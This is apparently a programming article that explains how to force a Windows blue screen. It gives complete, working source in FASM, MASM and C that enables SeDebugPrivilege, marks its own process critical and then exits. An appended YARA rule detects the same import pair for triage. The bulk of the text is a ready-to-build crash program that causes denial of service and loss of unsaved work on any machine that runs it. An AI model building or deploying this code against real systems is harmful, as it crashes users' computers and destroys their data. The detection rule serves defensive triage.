BSOD
This article will describe how to produce a blue screen of death on any Windows operating system using FASM/MASM.
Notice: If you want to test this, consider using a virtual machine instead of a production system.
How it works
It is pretty simple. The whole procedure consists of 3 steps:
- Get debug privileges. For this we make use of SeDebugPrivilege.
- Set the current process to critical.
- ExitProcess will terminate our process.
And because we have a 'critical process', which is meant to be used for driver purposes, we cannot terminate it without making it non-critical again. Terminating it while it is still critical will result in a blue screen!
The executable size of the MASM version is only 1024 bytes, so pretty small. Check out the source code snippets or download the source code.
Source-Code in FASM (1 KB):
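format PE GUI 4.0
include 'win32a.inc'

    lea eax, [esp+20]                         ; eax = stack slot that receives the previous privilege state
    invoke RtlAdjustPrivilege, 20, 1, 0, eax  ; 20 = SeDebugPrivilege, 1 = enable, 0 = process token
    invoke RtlSetProcessIsCritical, 1, 0, 0   ; 1 = mark the current process as critical
    invoke ExitProcess, 0                     ; terminating the critical process causes the blue screen

; import table: ExitProcess from kernel32, the two Rtl* routines from ntdll
data import
    library \
        kernel32, 'kernel32', \
        ntdll, 'ntdll'
    import kernel32, \
        ExitProcess, 'ExitProcess'
    import ntdll, \
        RtlAdjustPrivilege, 'RtlAdjustPrivilege', \
        RtlSetProcessIsCritical, 'RtlSetProcessIsCritical'
end data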
Source-Code in MASM (1 KB):
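.386
.model flat, stdcall
option casemap :none

; prototypes declared by hand; the two Rtl* routines are exported by ntdll
ExitProcess PROTO :DWORD
RtlAdjustPrivilege PROTO :DWORD,:DWORD,:DWORD,:DWORD
RtlSetProcessIsCritical PROTO :DWORD,:DWORD,:DWORD

includelib \masm32\lib\kernel32.lib
includelib ntdll.lib

.code
start:
    lea eax, [esp+20]                         ; eax = stack slot that receives the previous privilege state
    invoke RtlAdjustPrivilege, 20, 1, 0, eax  ; 20 = SeDebugPrivilege, 1 = enable, 0 = process token
    invoke RtlSetProcessIsCritical, 1, 0, 0   ; 1 = mark the current process as critical
    invoke ExitProcess, 0                     ; terminating the critical process causes the blue screen
end start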
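Equivalent Source-Code in C (1.5 KB compiled with tcc):
#include <windows.h>

/* ntdll exports that the SDK headers do not declare; prototypes written by hand */
LONG WINAPI RtlAdjustPrivilege(ULONG, BOOLEAN, BOOLEAN, PBOOLEAN);
LONG WINAPI RtlSetProcessIsCritical(BOOLEAN, PBOOLEAN, BOOLEAN);

int main()
{
    BOOLEAN e = 0;                     /* receives the previous privilege state */
    RtlAdjustPrivilege(20, 1, 0, &e);  /* 20 = SeDebugPrivilege, enabled for the process */
    RtlSetProcessIsCritical(1, 0, 0);  /* mark the current process as critical */
    ExitProcess(0);                    /* ExitProcess takes an exit code */
}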
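For triage, the import pair that all three listings above share can be matched statically. The following YARA rule is an added example, not part of the original article; the rule name and meta text are assumptions. The DLL-name pattern accepts both 'ntdll.dll' and the extension-less 'ntdll' string written in the FASM library statement, which a literal "ntdll.dll" match would miss.

```yara
import "pe"

rule Triage_CriticalProcess_Import_Pair   // rule name is an assumption
{
    meta:
        description = "PE importing RtlAdjustPrivilege and RtlSetProcessIsCritical from ntdll"
        note = "Triage hint only: legitimate system software may import the same pair"

    condition:
        // MZ header first, so the pe module is only consulted for PE candidates
        uint16(0) == 0x5A4D and
        // regex form of pe.imports: DLL name with or without the .dll suffix
        pe.imports(/^ntdll(\.dll)?$/i, /^RtlAdjustPrivilege$/) and
        pe.imports(/^ntdll(\.dll)?$/i, /^RtlSetProcessIsCritical$/)
}
```

The rule only sees names that are present in the import table; a binary that resolves the two routines at run time needs a string-based or behavioural check instead.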